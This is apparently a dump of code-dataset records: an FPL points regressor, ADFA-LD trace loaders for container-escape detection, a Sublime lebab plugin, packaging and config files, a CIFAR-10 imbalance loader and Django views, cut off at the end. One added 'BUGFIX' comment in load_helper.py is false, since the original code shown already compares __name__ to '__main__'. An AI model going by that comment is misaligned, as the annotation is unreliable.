# trainInput.drop(["Position"], axis=1, inplace=True)
# #converting dataframes to numpy arrays
# inputNP = np.asarray(trainInput)
# outputNP = np.asarray(trainOutput)
# #train/test split
# #inpTrain, inpTest, outTrain, outTest = train_test_split(inputNP, outputNP, test_size=0.20)
# #define model
# ##parameters - tuning still in process
# nEpochs = 100
# batch = 32
# model =
# model.compile(
# optimizer="adam",
# loss = "mean_squared_error",
# metrics = ["accuracy"]
# )
# wandb.config = {
# "learning_rate": 0.001,
# "epochs": nEpochs,
# "batch_size": batch
# }
# #run
# model.fit(inputNP,outputNP,batch_size=batch, validation_split=0.20,verbose=2,epochs=nEpochs, callbacks=[WandbCallback()])
# #model.save_weights("weights")
# #print(model.evaluate(inpTest, outTest, verbose=2)) | 33.142857 | 124 | 0.726459 | import pandas as pd
import math
from sklearn.ensemble import RandomForestRegressor
# --- training data -------------------------------------------------------
# NOTE(review): the .xlsx paths are relative to the cwd; confirm the
# script is always launched from the Season_Data directory.
trainInput = pd.read_excel("FPL_Season_Data_Only_Inputs_Shuffled2.xlsx")
# The first column is an index artifact of the export; drop it.
trainInput = trainInput.drop(trainInput.columns[0], axis=1)
trainOutput = pd.read_excel("FPL_Season_Data_Only_Outputs_Shuffled2.xlsx")
trainOutput = trainOutput.pop("Points")
# One-hot encode the categorical Position column.
position = pd.get_dummies(trainInput["Position"],prefix="Position")
trainInput = pd.concat([position,trainInput], axis =1)
trainInput.drop(["Position"], axis=1, inplace=True)
# Drop the card/bonus columns (same columns removed from both frames
# so train and prediction inputs stay aligned).
trainInput.drop(["YC"], axis=1, inplace=True)
trainInput.drop(["RC"], axis=1, inplace=True)
trainInput.drop(["Bonus Points"], axis=1, inplace=True)
# --- prediction data: must receive the identical preprocessing ----------
df = pd.read_excel("PredictionsData.xlsx")
position = pd.get_dummies(df["Position"],prefix="Position")
df = pd.concat([position,df], axis =1)
df.drop(["Position"], axis=1, inplace=True)
df.drop(["YC"], axis=1, inplace=True)
df.drop(["RC"], axis=1, inplace=True)
df.drop(["Bonus Points"], axis=1, inplace=True)
# Keep the player names aside; they are re-attached to the predictions.
names = df.pop("Name")
# --- fit and predict -----------------------------------------------------
regressor = RandomForestRegressor(n_estimators = 10000, random_state=30)
regressor.fit(trainInput,trainOutput)
predictions = regressor.predict(df)
predictionsDF = pd.DataFrame(predictions, columns=["Points"])
predictionsDF = pd.concat([names, predictionsDF],axis=1)
predictionsDF.sort_values("Points",ascending=False, inplace=True)
predictionsDF.to_excel("PredictionsRF10k.xlsx")
# import numpy as np
# import tensorflow as tf
# import pandas as pd
# import wandb
# from wandb.keras import WandbCallback
# #initializing
# np.set_printoptions(precision=4, suppress=True)
# wandb.init(project="RandomForest", entity="matthewlchen",sync_tensorboard=True)
# #pulling data
# trainInput = pd.read_excel("FPL_Season_Data_Only_Inputs_Shuffled2.xlsx")
# trainInput = trainInput.drop(trainInput.columns[0], axis=1)
# trainOutput = pd.read_excel("FPL_Season_Data_Only_Outputs_Shuffled2.xlsx")
# trainOutput = trainOutput.pop("Points")
# #transforming categorical position data into one hot encoding
# position = pd.get_dummies(trainInput["Position"],prefix="Position")
# trainInput = pd.concat([position,trainInput], axis =1)
# trainInput.drop(["Position"], axis=1, inplace=True)
# #converting dataframes to numpy arrays
# inputNP = np.asarray(trainInput)
# outputNP = np.asarray(trainOutput)
# #train/test split
# #inpTrain, inpTest, outTrain, outTest = train_test_split(inputNP, outputNP, test_size=0.20)
# #define model
# ##parameters - tuning still in process
# nEpochs = 100
# batch = 32
# model =
# model.compile(
# optimizer="adam",
# loss = "mean_squared_error",
# metrics = ["accuracy"]
# )
# wandb.config = {
# "learning_rate": 0.001,
# "epochs": nEpochs,
# "batch_size": batch
# }
# #run
# model.fit(inputNP,outputNP,batch_size=batch, validation_split=0.20,verbose=2,epochs=nEpochs, callbacks=[WandbCallback()])
# #model.save_weights("weights")
# #print(model.evaluate(inpTest, outTest, verbose=2)) | 0 | 0 | 0 |
338d5c5eac8fc90fd690b66c2251645f25f8ea2a | 2,269 | py | Python | load_helper.py | Alger-Z/ContainerEscapeDetection | c42357e301dd291e0250768ac8c0922207c71a96 | [
"Apache-2.0"
] | null | null | null | load_helper.py | Alger-Z/ContainerEscapeDetection | c42357e301dd291e0250768ac8c0922207c71a96 | [
"Apache-2.0"
] | null | null | null | load_helper.py | Alger-Z/ContainerEscapeDetection | c42357e301dd291e0250768ac8c0922207c71a96 | [
"Apache-2.0"
] | null | null | null | import re
import os
from numpy.lib.function_base import insert
from utils import *
if __name__ =='__main__':
pass
#load_adfa_Attack_files("./ADFA-LD/Attack_Data_Master/")
| 25.494382 | 81 | 0.577347 | import re
import os
from numpy.lib.function_base import insert
from utils import *
def load_one_flle(filename):
    """Read the first line of *filename* and return its whitespace-split tokens.

    Only the first line is consumed; an empty file yields []. (The
    misspelled name — "flle" — is kept because every loader in this
    module calls it.)
    """
    with open(filename) as handle:
        first_line = handle.readline()
    return first_line.strip('\n').split()
def load_adfa_training_files(rootdir):
    """Load every regular file directly under rootdir as one trace.

    Returns (x, y): x holds one token list per file (via load_one_flle)
    and y a matching 0 ("normal"/training) label for each. Directory
    order follows os.listdir, as before.
    """
    traces = []
    labels = []
    for entry in os.listdir(rootdir):
        full_path = os.path.join(rootdir, entry)
        if os.path.isfile(full_path):
            traces.append(load_one_flle(full_path))
            labels.append(0)
    return traces, labels
def load_training_files(rootdir):
    """Load all regular files directly under rootdir, labeled 0.

    The body was a line-for-line duplicate of load_adfa_training_files;
    delegate instead so the logic lives in one place. Same return shape:
    (list of token lists, list of 0 labels).
    """
    return load_adfa_training_files(rootdir)
def load_escp_files(rootdir):
    """Load escape-detection traces: regular files under rootdir, labeled 0.

    The body was a line-for-line duplicate of load_adfa_training_files;
    delegate instead so the logic lives in one place. Same return shape:
    (list of token lists, list of 0 labels).
    """
    return load_adfa_training_files(rootdir)
def dirlist(path, allfile):
    """Recursively append every non-directory path under *path* to *allfile*.

    Directories are descended into depth-first; everything else (files,
    symlinks, ...) is recorded. The same *allfile* list is returned for
    call-chaining convenience.
    """
    for entry in os.listdir(path):
        full_path = os.path.join(path, entry)
        if os.path.isdir(full_path):
            dirlist(full_path, allfile)
        else:
            allfile.append(full_path)
    return allfile
def load_adfa_webshell_files(rootdir):
    """Collect web-shell attack traces from the ADFA-LD tree, labeled 1.

    Walks rootdir recursively and keeps paths matching the
    Web_Shell_<n>/UAD-W... naming scheme.
    NOTE(review): the pattern anchors on "./ADFA-LD/..." — it only
    matches when callers pass exactly that rootdir prefix; confirm.
    """
    x = []
    y = []
    pattern = re.compile(r"\./ADFA-LD/Attack_Data_Master/Web_Shell_\d+/UAD-W*")
    for filepath in dirlist(rootdir, []):
        if pattern.match(filepath):
            x.append(load_one_flle(filepath))
            y.append(1)
    return x, y
def load_adfa_Adduser_files(rootdir):
    """Collect Adduser attack traces from the ADFA-LD tree, labeled 1.

    Walks rootdir recursively and keeps paths matching the
    Adduser_<n>/UAD-W... naming scheme.
    NOTE(review): the pattern anchors on "./ADFA-LD/..." — it only
    matches when callers pass exactly that rootdir prefix; confirm.
    """
    x = []
    y = []
    pattern = re.compile(r"\./ADFA-LD/Attack_Data_Master/Adduser_\d+/UAD-W*")
    for filepath in dirlist(rootdir, []):
        if pattern.match(filepath):
            x.append(load_one_flle(filepath))
            y.append(1)
    return x, y
def load_adfa_Attack_files(rootdir):
    """Recursively load every file whose path ends in 'txt', labeled 1 (attack)."""
    x = []
    y = []
    txt_pattern = re.compile(r".*txt$")
    for filepath in dirlist(rootdir, []):
        if txt_pattern.match(filepath):
            x.append(load_one_flle(filepath))
            y.append(1)
    return x, y
if __name__ == '__main__':
    # BUGFIX: the original compared __name__ against 'main', which is
    # never its value, so this guard could never fire.
    pass
    #load_adfa_Attack_files("./ADFA-LD/Attack_Data_Master/")
| 1,901 | 0 | 182 |
b68228d5f4415656679f5941afc1efdf19942bde | 3,455 | py | Python | lebab.py | edasque/sublime-lebab | a2a3ac0d207650b89aa55d9500f905fc19340178 | [
"MIT"
] | 3 | 2016-07-29T02:53:26.000Z | 2017-04-24T01:17:12.000Z | lebab.py | edasque/sublime-lebab | a2a3ac0d207650b89aa55d9500f905fc19340178 | [
"MIT"
] | 2 | 2016-07-29T02:58:37.000Z | 2016-07-29T12:36:53.000Z | lebab.py | edasque/sublime-lebab | a2a3ac0d207650b89aa55d9500f905fc19340178 | [
"MIT"
] | null | null | null | import sublime, sublime_plugin
import json
import os
import platform
import subprocess
if platform.system() == 'Darwin':
os_name = 'osx'
elif platform.system() == 'Windows':
os_name = 'windows'
else:
os_name = 'linux'
# /usr/local/lib/node_modules/lebab/bin/index.js
BIN_PATH = os.path.join(
sublime.packages_path(),
os.path.dirname(os.path.realpath(__file__)),
'lebab-transform.js'
)
| 31.697248 | 92 | 0.586397 | import sublime, sublime_plugin
import json
import os
import platform
import subprocess
if platform.system() == 'Darwin':
os_name = 'osx'
elif platform.system() == 'Windows':
os_name = 'windows'
else:
os_name = 'linux'
# /usr/local/lib/node_modules/lebab/bin/index.js
BIN_PATH = os.path.join(
sublime.packages_path(),
os.path.dirname(os.path.realpath(__file__)),
'lebab-transform.js'
)
class LebabCommand(sublime_plugin.TextCommand):
    """Sublime Text command that pipes the selection (or the whole
    buffer) through lebab and opens the transformed code in a new
    scratch view."""

    def description(self):
        # BUGFIX: the original declared description() without `self`, so
        # Sublime's bound-method call raised TypeError.
        return "Description works"

    def run(self, edit):
        """Entry point invoked by Sublime: transform and display the code."""
        print("BIN_PATH:", BIN_PATH)
        selected_text = self.get_text()
        code = self.lebabify(selected_text)
        print("Code:\n" + code)
        if code:
            w = sublime.Window.new_file(self.view.window())
            w.settings().set('default_extension', 'js')
            w.set_syntax_file(self.view.settings().get('syntax'))
            # A scratch view never prompts the user to save on close.
            w.set_scratch(True)
            w.insert(edit, 0, code)
        else:
            print("Lebab: No code returned")

    def get_text(self):
        """Return the concatenated selections, or the whole buffer when
        nothing is selected."""
        if not self.has_selection():
            region = sublime.Region(0, self.view.size())
            return self.view.substr(region)
        selected_text = ''
        for region in self.view.sel():
            selected_text = selected_text + self.view.substr(region) + '\n'
        return selected_text

    def has_selection(self):
        """True when at least one selection region is non-empty."""
        for sel in self.view.sel():
            if sel.a != sel.b:
                return True
        return False

    def get_setting(self, key):
        """Read `key` from the view-local 'Babel' settings dict, falling
        back to the Babel.sublime-settings file."""
        settings = self.view.settings().get('Babel')
        if settings is None:
            settings = sublime.load_settings('Babel.sublime-settings')
        return settings.get(key)

    def get_setting_by_os(self, key):
        """Return the current-OS entry of a dict-valued setting (or None)."""
        setting = self.get_setting(key)
        if setting:
            return setting.get(os_name)

    def lebabify(self, data):
        """Run `data` through the Node bridge; on any failure the error
        text is returned (and thus shown instead of code)."""
        try:
            return node_bridge(data, BIN_PATH, [json.dumps({
                # from sublime
                'filename': self.view.file_name(),
                'newline_at_eof': self.view.settings().get('ensure_newline_at_eof_on_save'),
                # from babel-sublime settings
                'debug': True,  # self.get_setting('debug'),
                'use_local_babel': self.get_setting('use_local_babel'),
                'node_modules': self.get_setting_by_os('node_modules'),
                'options': self.get_setting('options')
            })])
        except Exception as e:
            return str(e)
def node_bridge(data, bin, args=None):
    """Pipe `data` through a Node.js script and return its stdout.

    Parameters:
        data: text sent to the script's stdin (UTF-8 encoded).
        bin: path of the JavaScript file to execute with `node`.
        args: optional extra command-line arguments for the script.

    Raises:
        Exception: when `node` is not on PATH, or the script wrote
            anything to stderr.
    """
    # BUGFIX: a mutable default ([]) is shared across calls; use the
    # None sentinel instead (behavior is otherwise unchanged).
    if args is None:
        args = []
    env = os.environ.copy()
    startupinfo = None
    if os_name == 'osx':
        # GUI apps in OS X don't contain .bashrc/.zshrc set paths
        env['PATH'] += ':/usr/local/bin'
    elif os_name == 'windows':
        # Suppress the console window that Popen would otherwise flash.
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
    try:
        p = subprocess.Popen(
            ['node', bin] + args,
            stdout=subprocess.PIPE,
            stdin=subprocess.PIPE,
            stderr=subprocess.PIPE,
            env=env,
            startupinfo=startupinfo
        )
    except OSError:
        raise Exception('Error: Couldn\'t find "node" in "%s"' % env['PATH'])
    stdout, stderr = p.communicate(input=data.encode('utf-8'))
    stdout = stdout.decode('utf-8')
    stderr = stderr.decode('utf-8')
    if stderr:
        raise Exception('Error: %s' % stderr)
    else:
        return stdout
| 2,783 | 26 | 233 |
cbe337a29dd71a50920d6cfe3e1874dc9b6aa136 | 2,063 | py | Python | setup.py | michhar/chantilly | 6a8e4c3605a830c952d1cc8fd6405e5b4c104633 | [
"BSD-3-Clause"
] | 43 | 2019-10-03T12:30:38.000Z | 2020-11-11T10:43:51.000Z | setup.py | michhar/chantilly | 6a8e4c3605a830c952d1cc8fd6405e5b4c104633 | [
"BSD-3-Clause"
] | 16 | 2020-03-20T15:27:06.000Z | 2020-10-07T21:04:07.000Z | setup.py | michhar/chantilly | 6a8e4c3605a830c952d1cc8fd6405e5b4c104633 | [
"BSD-3-Clause"
] | 4 | 2020-04-26T00:06:39.000Z | 2020-11-11T11:44:22.000Z | import io
import os
from setuptools import find_packages, setup
here = os.path.abspath(os.path.dirname(__file__))
# Package meta-data.
NAME = 'chantilly'
DESCRIPTION = 'Deployment tool for online machine learning models'
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
URL = 'https://github.com/creme-ml/chantilly'
EMAIL = 'maxhalford25@gmail.com'
AUTHOR = 'Max Halford'
REQUIRES_PYTHON = '>=3.7.0'
# Import the README and use it as the long-description.
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
# Load the package's __version__.py module as a dictionary.
about = {}
with open(os.path.join(here, 'chantilly', '__version__.py')) as f:
exec(f.read(), about)
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,
author=AUTHOR,
author_email=EMAIL,
license='BSD-3',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
packages=find_packages(),
include_package_data=True,
python_requires=REQUIRES_PYTHON,
url=URL,
zip_safe=False,
install_requires=[
'cerberus>=1.3.2',
'river>=0.9.0',
'dill>=0.3.1.1',
'Flask>=1.1.1'
],
extras_require={
'redis': ['redis>=3.5'],
'dev': [
'flake8>=3.7.9',
'mypy>=0.770',
'pytest>=5.3.5',
'pytest-cov>=2.8.1'
]
},
entry_points={
'console_scripts': [
'chantilly=chantilly:cli_hook'
],
}
)
| 29.056338 | 76 | 0.624818 | import io
import os
from setuptools import find_packages, setup
# NOTE(review): io.open is used below; `import io` sits at the very top
# of the original file (outside this span) — confirm it is present.
# All reads below are resolved relative to this setup script so the
# build works regardless of the caller's cwd.
here = os.path.abspath(os.path.dirname(__file__))
# Package meta-data.
NAME = 'chantilly'
DESCRIPTION = 'Deployment tool for online machine learning models'
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
URL = 'https://github.com/creme-ml/chantilly'
EMAIL = 'maxhalford25@gmail.com'
AUTHOR = 'Max Halford'
REQUIRES_PYTHON = '>=3.7.0'
# Import the README and use it as the long-description.
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = '\n' + f.read()
# Load the package's __version__.py module as a dictionary.
about = {}
with open(os.path.join(here, 'chantilly', '__version__.py')) as f:
    exec(f.read(), about)
# Everything gathered above is handed to setuptools here.
setup(
    name=NAME,
    version=about['__version__'],
    description=DESCRIPTION,
    long_description=long_description,
    long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,
    author=AUTHOR,
    author_email=EMAIL,
    license='BSD-3',
    classifiers=[
        # Trove classifiers
        # Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
        'License :: OSI Approved :: BSD License',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        'Programming Language :: Python :: Implementation :: CPython',
        'Programming Language :: Python :: Implementation :: PyPy'
    ],
    packages=find_packages(),
    include_package_data=True,
    python_requires=REQUIRES_PYTHON,
    url=URL,
    zip_safe=False,
    install_requires=[
        'cerberus>=1.3.2',
        'river>=0.9.0',
        'dill>=0.3.1.1',
        'Flask>=1.1.1'
    ],
    extras_require={
        'redis': ['redis>=3.5'],
        'dev': [
            'flake8>=3.7.9',
            'mypy>=0.770',
            'pytest>=5.3.5',
            'pytest-cov>=2.8.1'
        ]
    },
    entry_points={
        'console_scripts': [
            'chantilly=chantilly:cli_hook'
        ],
    }
)
| 0 | 0 | 0 |
d06fd2bcde44153c0b0a860dc6c5189095e2d061 | 1,738 | py | Python | em_stitch/utils/schemas.py | AllenInstitute/em_stitch | 5b24e57b83fdda14cdd7c2bd540c517f68c0569c | [
"BSD-2-Clause"
] | 2 | 2019-04-20T00:28:47.000Z | 2020-01-31T11:12:43.000Z | em_stitch/utils/schemas.py | AllenInstitute/em_stitch | 5b24e57b83fdda14cdd7c2bd540c517f68c0569c | [
"BSD-2-Clause"
] | 14 | 2019-04-22T17:05:11.000Z | 2020-11-03T20:49:35.000Z | em_stitch/utils/schemas.py | AllenInstitute/em_stitch | 5b24e57b83fdda14cdd7c2bd540c517f68c0569c | [
"BSD-2-Clause"
] | 1 | 2020-05-12T17:34:06.000Z | 2020-05-12T17:34:06.000Z | import warnings
from marshmallow.warnings import ChangedInMarshmallow3Warning
from argschema import ArgSchema
from argschema.fields import (
InputDir, InputFile, Float,
Int, OutputFile, Str, Boolean)
warnings.simplefilter(
action='ignore',
category=ChangedInMarshmallow3Warning)
| 35.469388 | 79 | 0.643268 | import warnings
from marshmallow.warnings import ChangedInMarshmallow3Warning
from argschema import ArgSchema
from argschema.fields import (
InputDir, InputFile, Float,
Int, OutputFile, Str, Boolean)
# Silence marshmallow-3 migration warnings triggered by argschema's
# marshmallow dependency.
warnings.simplefilter(
    action='ignore',
    category=ChangedInMarshmallow3Warning)
class GenerateEMTileSpecsParameters(ArgSchema):
    """Argument schema for generating tilespecs from a TEMCA acquisition metafile."""
    metafile = InputFile(
        required=True,
        description="metadata file containing TEMCA acquisition data")
    maskUrl = InputFile(
        required=False,
        default=None,
        missing=None,
        description="absolute path to image mask to apply")
    image_directory = InputDir(
        required=False,
        description=("directory used in determining absolute paths to images. "
                     "Defaults to parent directory containing metafile "
                     "if omitted."))
    maximum_intensity = Int(
        required=False, default=255,
        description=("intensity value to interpret as white"))
    minimum_intensity = Int(
        required=False, default=0,
        description=("intensity value to interpret as black"))
    z = Float(
        required=False,
        default=0,
        description=("z value"))
    sectionId = Str(
        required=False,
        description=("sectionId to apply to tiles during ingest. "
                     "If unspecified will default to a string "
                     "representation of the float value of z_index."))
    output_path = OutputFile(
        required=False,
        description="directory for output files")
    compress_output = Boolean(
        required=False,
        missing=True,
        default=True,
        # BUG FIX: this keyword was misspelled "escription"; marshmallow
        # silently stores unknown field kwargs as metadata, so the field
        # previously had no description at all.
        description=("tilespecs will be .json or .json.gz"))
| 0 | 1,403 | 23 |
f311ad910ad7272315fb76662295b913c6b7bbed | 435 | py | Python | config.py | zhoukaigo/Blog | ccc72d2eb1c85f68f0cdc6cb17021638dd4c59b9 | [
"MIT"
] | null | null | null | config.py | zhoukaigo/Blog | ccc72d2eb1c85f68f0cdc6cb17021638dd4c59b9 | [
"MIT"
] | null | null | null | config.py | zhoukaigo/Blog | ccc72d2eb1c85f68f0cdc6cb17021638dd4c59b9 | [
"MIT"
] | null | null | null | import os
basedir = os.path.abspath(os.path.dirname(__file__))
| 20.714286 | 82 | 0.701149 | import os
basedir = os.path.abspath(os.path.dirname(__file__))
class config:
    """Flask application settings (lowercase class name kept: callers import `config`)."""
    # Session-signing key: environment variable wins, with a hard-coded
    # development fallback when unset.
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'hard to guess string'
    # SQLite development database stored next to this module (basedir above).
    SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'data-dev.sqlite')
    DEBUG = True
    # OAuth app credentials read from the environment.
    # NOTE(review): attribute name is misspelled ("CRENDENTIALS") but callers
    # presumably look it up under this exact name, so it is documented, not renamed.
    OAUTH_CRENDENTIALS = {
        'facebook':{
            'id': os.environ.get('FACEBOOK_ID_LOCAL'),
            'secret': os.environ.get('FACEBOOK_SECRET_LOCAL')
        }
    }
    @staticmethod
    def init_app(app):
        # Hook for configuration-specific app initialisation; no-op here.
        pass
| 4 | 342 | 23 |
312e3692c41b0390ba6a7a1445764ad07fb9b002 | 3,923 | py | Python | dataset.py | Montherapy/Deep-reinforcement-learning-for-multi-class-imbalanced-classification | 19b9f5f758c9deaf490c942477d01e5e7c2ab94a | [
"MIT"
] | 2 | 2021-11-09T07:28:52.000Z | 2022-03-31T10:50:48.000Z | dataset.py | Montherapy/Deep-reinforcement-learning-for-multi-class-imbalanced-classification | 19b9f5f758c9deaf490c942477d01e5e7c2ab94a | [
"MIT"
] | null | null | null | dataset.py | Montherapy/Deep-reinforcement-learning-for-multi-class-imbalanced-classification | 19b9f5f758c9deaf490c942477d01e5e7c2ab94a | [
"MIT"
] | null | null | null | import tensorflow as tf
import numpy as np
| 49.0375 | 188 | 0.644405 | import tensorflow as tf
import numpy as np
class Dataset:
    """CIFAR-10 wrapper that regroups classes, optionally subsamples minority
    classes to control the imbalance ratio, and derives per-class rewards
    (reciprocal of class frequency, L2-normalized)."""
    def __init__(self, config):
        # config.new_class: dict mapping new label -> list of old CIFAR labels
        # (see get_label_changer); config.minority_subsample_rate and
        # config.minor_classes drive the subsampling step.
        self.config = config
        self.n_class = len(self.config.new_class)
        self.label_connector = {}
        self.get_label_changer()
        self.set_data(self.config.minority_subsample_rate)
        self.get_rho()
    def get_label_changer(self):
        """Build label_connector: old CIFAR label -> regrouped new label."""
        new_class_setting = self.config.new_class # old classes to new class
        for new_label in new_class_setting.keys():
            for old_label in new_class_setting[new_label]:
                self.label_connector[old_label] = new_label
        for new_label, old_label in new_class_setting.items():
            print("\nNew label {} = old label".format(new_label), *old_label)
    def set_data(self, minority_subsample_rate=1):
        """Load CIFAR-10, keep only mapped classes, relabel, subsample
        minority classes (rate < 1), and normalize images."""
        (x_train, y_train), (x_test, y_test) = tf.keras.datasets.cifar10.load_data()
        # 1. Delete non-used class
        survived_class = list(self.label_connector.keys())
        self.x_train = x_train[np.isin(y_train, survived_class).squeeze()]
        self.x_test = x_test[np.isin(y_test, survived_class).squeeze()]
        y_train = y_train[np.isin(y_train, survived_class).squeeze()].reshape(-1, 1)
        y_test = y_test[np.isin(y_test, survived_class).squeeze()].reshape(-1, 1)
        # 2. Change from old label to new label
        self.y_train, self.y_test = -np.ones_like(y_train), -np.ones_like(y_test)
        for i, old in enumerate(y_train.squeeze()):
            self.y_train[i, 0] = self.label_connector[old]
        for i, old in enumerate(y_test.squeeze()):
            self.y_test[i, 0] = self.label_connector[old]
        # 3. Minor class subsampling for decrease imbalance ratio
        if minority_subsample_rate < 1:
            # decrease the number of minority class
            nums_cls = self.get_class_num()
            delete_indices = set()
            for minor_cl in self.config.minor_classes:
                num_cl = nums_cls[minor_cl]
                idx_cl = np.where(self.y_train == minor_cl)[0]
                delete_idx = np.random.choice(idx_cl, int(num_cl * (1 - minority_subsample_rate)), replace=False)
                delete_indices.update(delete_idx)
            survived_indices = set(range(len(self.y_train))).difference(delete_indices)
            self.y_train = self.y_train[list(survived_indices)]
            self.x_train = self.x_train[list(survived_indices)]
        print("\nNumber of each class.")
        for cl_idx, cl_num in enumerate(self.get_class_num()):
            print("\t- Class {} : {}".format(cl_idx, cl_num))
        print("\nImbalance ratio compared to major class.")
        for cl_idx, cl_ratio in enumerate(self.get_class_num() / max(self.get_class_num())):
            print("\t- Class {} : {:.3f}".format(cl_idx, cl_ratio))
        # 4. Data normalization
        # per-channel mean computed on the (subsampled) training set only
        image_mean = np.array([self.x_train[..., i].mean() for i in range(3)])
        self.x_train = (self.x_train - image_mean) / 255
        self.x_test = (self.x_test - image_mean) / 255
    def get_class_num(self):
        # get number of all classes
        _, nums_cls = np.unique(self.y_train, return_counts=True)
        return nums_cls
    def get_rho(self):
        """
        In the two-class dataset problem, this paper has proven that the best performance is achieved when the reciprocal of the ratio of the number of data is used as the reward function.
        In this code, the result of this paper is extended to multi-class by creating a reward function with the reciprocal of the number of data for each class.
        """
        nums_cls = self.get_class_num()
        raw_reward_set = 1 / nums_cls
        self.reward_set = np.round(raw_reward_set / np.linalg.norm(raw_reward_set), 6)
        print("\nReward for each class.")
        for cl_idx, cl_reward in enumerate(self.reward_set):
            print("\t- Class {} : {:.6f}".format(cl_idx, cl_reward)) | 3,021 | 836 | 23 |
9b18b289fbdc9eebf80838f115db5723f06bf47e | 4,914 | py | Python | hknweb/studentservices/views.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | hknweb/studentservices/views.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | hknweb/studentservices/views.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from django.urls import reverse
from django.http import JsonResponse
from django.conf import settings
from django.contrib import messages
from django.core.mail import EmailMessage
from django.template.loader import render_to_string
from hknweb.events.views.aggregate_displays.calendar import calendar_helper
from hknweb.events.views.event_transactions.show_event import show_details_helper
from hknweb.utils import allow_public_access
from hknweb.studentservices.models import (
CourseGuideNode,
CourseGuideAdjacencyList,
CourseGuideGroup,
CourseGuideParam,
)
from hknweb.studentservices.forms import DocumentForm, TourRequest
@allow_public_access
@allow_public_access
@allow_public_access
@allow_public_access
@allow_public_access
@allow_public_access
| 29.781818 | 103 | 0.61396 | from django.shortcuts import render, redirect
from django.urls import reverse
from django.http import JsonResponse
from django.conf import settings
from django.contrib import messages
from django.core.mail import EmailMessage
from django.template.loader import render_to_string
from hknweb.events.views.aggregate_displays.calendar import calendar_helper
from hknweb.events.views.event_transactions.show_event import show_details_helper
from hknweb.utils import allow_public_access
from hknweb.studentservices.models import (
CourseGuideNode,
CourseGuideAdjacencyList,
CourseGuideGroup,
CourseGuideParam,
)
from hknweb.studentservices.forms import DocumentForm, TourRequest
@allow_public_access
def resume_critique_submit(request):
    """Resume-critique page: renders the upload form; on a valid POST, saves
    the uploaded document and shows a thank-you message."""
    form = DocumentForm(request.POST or None, request.FILES or None)
    success = request.method == "POST" and form.is_valid()
    if success:
        form.save()
        messages.success(request, "Thank you for submitting your resume!")
    context = {"form": form, "success": success}
    return render(request, "studentservices/resume_critique.html", context)
@allow_public_access
def reviewsessions(request):
    """Calendar view filtered to review-session events."""
    event_type = "Review Session"
    return calendar_helper(request, event_type=event_type)
@allow_public_access
def show_reviewsession_details(request, id):
    """Detail view for one review session; the back link points at the calendar."""
    back_link = reverse("studentservices:reviewsessions")
    return show_details_helper(request, id, back_link, False)
@allow_public_access
def tours(request):
    """Department-tour request page: renders the request form and, on a valid
    POST, saves the request and emails the department-relations officer."""
    form = TourRequest(request.POST or None)
    if request.method == "POST":
        if form.is_valid():
            form.save()
            # Send deprel an email
            subject = "Department Tour Request"
            officer_email = "deprel@hkn.eecs.berkeley.edu"
            html_content = render_to_string(
                "studentservices/tour_request_email.html",
                {
                    "name": form.instance.name,
                    "datetime": form.instance.datetime,
                    "email": form.instance.email,
                    "phone": form.instance.phone,
                    "comments": form.instance.comments,
                },
            )
            # HTML email sent from the site's no-reply address.
            msg = EmailMessage(
                subject, html_content, settings.NO_REPLY_EMAIL, [officer_email]
            )
            msg.content_subtype = "html"
            msg.send()
            messages.success(request, "Your request has been sent!")
            # Redirect-after-POST so a refresh cannot resubmit the form.
            return redirect("studentservices:tours")
        else:
            msg = "Something went wrong! Your request did not send. Try again, or email deprel@hkn.mu."
            messages.error(request, msg)
    return render(request, "studentservices/tours.html", {"form": form})
@allow_public_access
def course_guide(request):
    """Course-guide page: display parameters (when configured) plus the list
    of selectable, non-Core group names."""
    context = dict()
    if CourseGuideParam.objects.exists():
        context["params"] = CourseGuideParam.objects.first().to_dict()
    selectable = [
        g.name for g in CourseGuideGroup.objects.all() if g.name != "Core"
    ]
    context["groups"] = selectable
    return render(request, "studentservices/course_guide.html", context=context)
@allow_public_access
def course_guide_data(request):
    """Serve the course-guide graph (nodes + links) as JSON.

    The optional ``groups`` query parameter is a comma-separated list of
    group names to include; the "Core" group is always appended.
    """
    group_names = request.GET.get("groups", None)
    group_names = group_names.split(",") if group_names else []
    group_names.append("Core")
    # Node names of every group that passed the filter.
    groups = []
    for group in CourseGuideGroup.objects.all():
        if group_names and group.name not in group_names:
            continue
        groups.append([node.name for node in group.nodes.all()])
    # Map node name -> 1-based group number (consumed by the front end).
    node_groups = dict()
    for i, g in enumerate(groups):
        i += 1  # Start at group 1
        for n in g:
            node_groups[n] = i
    # Adjacency restricted to nodes that survived the group filter on
    # both the source and the target side.
    graph = dict()
    for adjacency_list in CourseGuideAdjacencyList.objects.all():
        if adjacency_list.source.name not in node_groups:
            continue
        graph[adjacency_list.source.name] = [
            node.name
            for node in adjacency_list.targets.all()
            if node.name in node_groups
        ]
    # Each node links to the course-surveys search page for its course name.
    course_surveys_link = reverse("course_surveys:index")
    link_template = f"{course_surveys_link}?search_by=courses&search_value="
    nodes = []
    for n in CourseGuideNode.objects.all():
        if n.name not in node_groups:
